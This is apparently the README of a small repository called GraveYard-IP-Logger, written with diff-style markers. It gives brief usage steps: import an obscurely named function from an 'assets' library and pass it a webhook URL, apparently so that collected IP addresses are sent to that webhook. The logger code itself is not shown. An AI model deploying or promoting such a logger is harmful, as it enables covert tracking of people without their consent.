b6m/GraveYard-IP-Logger/README.md

 ## Simple Internet Protocol Logger I've made

 Usage?
-> You Can Download The Assets Folder, And Import The file And boom
+> Download The Repo
-> Simple To Use, Look At The Grave -> 👻 .py File To See How to Use xdxd
+> Import the assets library
+> from assets.ip import 一
-> skids gtfo
+> 一("webhook_goes_here")
+> basically, just import the assets library and pass the arguement in the 一 function